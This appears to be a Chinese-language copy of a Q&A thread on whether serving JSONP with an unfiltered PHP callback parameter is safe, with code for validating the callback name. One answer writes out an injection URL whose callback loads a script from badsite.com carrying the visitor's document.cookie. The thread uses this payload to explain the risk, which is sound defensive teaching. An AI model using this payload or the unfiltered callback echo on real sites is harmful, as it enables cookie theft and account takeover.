代码之家  ›  专栏  ›  技术社区  ›  Svish

提供JSONP安全吗?

  •  23
  • Svish  · 技术社区  · 14 年前
    <?php header('content-type: application/json');
    
    $json = json_encode($data);
    
    echo isset($_GET['callback'])
        ? "{$_GET['callback']}($json)"
        : $json;
    

    或者我应该例如过滤 $_GET['callback']

    或者用JSONP过滤这个变量不是很重要吗?


    在博客中介绍了我目前的解决方案 http://www.geekality.net/?p=1021

    <?php header('content-type: application/json; charset=utf-8');
    
    function is_valid_callback($subject)
    {
         $identifier_syntax
           = '/^[$_\p{L}][$_\p{L}\p{Mn}\p{Mc}\p{Nd}\p{Pc}\x{200C}\x{200D}]*+$/u';
    
         $reserved_words = array('break', 'do', 'instanceof', 'typeof', 'case',
           'else', 'new', 'var', 'catch', 'finally', 'return', 'void', 'continue', 
           'for', 'switch', 'while', 'debugger', 'function', 'this', 'with', 
           'default', 'if', 'throw', 'delete', 'in', 'try', 'class', 'enum', 
           'extends', 'super', 'const', 'export', 'import', 'implements', 'let', 
           'private', 'public', 'yield', 'interface', 'package', 'protected', 
           'static', 'null', 'true', 'false');
    
         return preg_match($identifier_syntax, $subject)
             && ! in_array(mb_strtolower($subject, 'UTF-8'), $reserved_words);
    }
    
    $data = array(1, 2, 3, 4, 5, 6, 7, 8, 9);
    $json = json_encode($data);
    
    # JSON if no callback
    if( ! isset($_GET['callback']))
         exit( $json );
    
    # JSONP if valid callback
    if(is_valid_callback($_GET['callback']))
         exit( "{$_GET['callback']}($json)" );
    
    # Otherwise, bad request
    header('Status: 400 Bad Request', true, 400);
    
    3 回复  |  直到 13 年前
        1
  •  17
  •   Eli Grey    13 年前

    不,如果您打算将JSONP限制为选择域。也要指定编码,否则不能访问JSON的人可能会进行UTF-7注入攻击。改用此标题:

    header('Content-Type: application/json; charset=utf-8');
    

    如果它应该是一个公共JSONP服务,那么是的,它是安全的,而且还可以使用 application/javascript application/json .

        2
  •  9
  •   Christian    13 年前

    callback 只允许有效的JS函数名。没什么复杂的,只是不允许终端开发人员注入 javascript。

    <?php
    
        header('Content-Type: application/json; charset=utf-8'); // Thanks Eli
    
        /**
         * Ensures that input string matches a set of whitelisted characters and
         * replaces unlisted ones with a replacement string (defaults to underscore).
         * @param string $orig The original text to filter.
         * @param string $replace The replacement string (default is underscore).
         * @param string The original text with bad characters replaced with $replace.
         * @link https://github.com/uuf6429/K2F/blob/master/K2F-DEV/core/security.php#L263
         */
        function strtoident($orig,$replace=''){
            $orig=(string)$orig;                  // ensure input is a string
            for($i=0; $i<strlen($orig); $i++){
                $o=ord($orig{$i});
                if(!(  (($o>=48) && ($o<=57))     // numbers
                    || (($o>=97) && ($o<=122))    // lowercase
                    || (($o>=65) && ($o<=90))     // uppercase
                    || ($orig{$i}=='_')))         // underscore
                       $orig{$i}=$replace;        // check failed, use replacement
            }
            return $orig;
        }
    
        $json=json_encode($data)
    
        echo isset($_GET['callback'])
            ? strtoident($_GET['callback']).'('.$json.');'
            : $json;
    
    ?>
    

    编辑:

    http://yoursite.com/jsonp.php?callback=(function(){ $(document.body).append('<script type="text/javascript" src="http://badsite.com/?usercookies='+document.cookie+'"></script>'); })//
    

    可细分为:

    (function(){
        $(document.body).append(
            '<script type="text/javascript" src="http://badsite.com/?usercookies='+document.cookie+'"></script>'
        );
    })//("whatever");
    

    由于后一部分是您编码的json,因此很容易用注释将其取消(尽管对于他们的攻击来说是不必要的)。 基本上,黑客可以了解用户的cookies(除其他外),这有助于他访问用户在您的网站上的帐户。

    UTF-8兼容性。为了证实我的说法, read here . 或:

    与UTF-16和UTF-32一样,UTF-8可以表示Unicode字符集中的每个字符。与之不同的是,它与ASCII向后兼容,避免了endianness和byte order marks(BOM)的复杂性。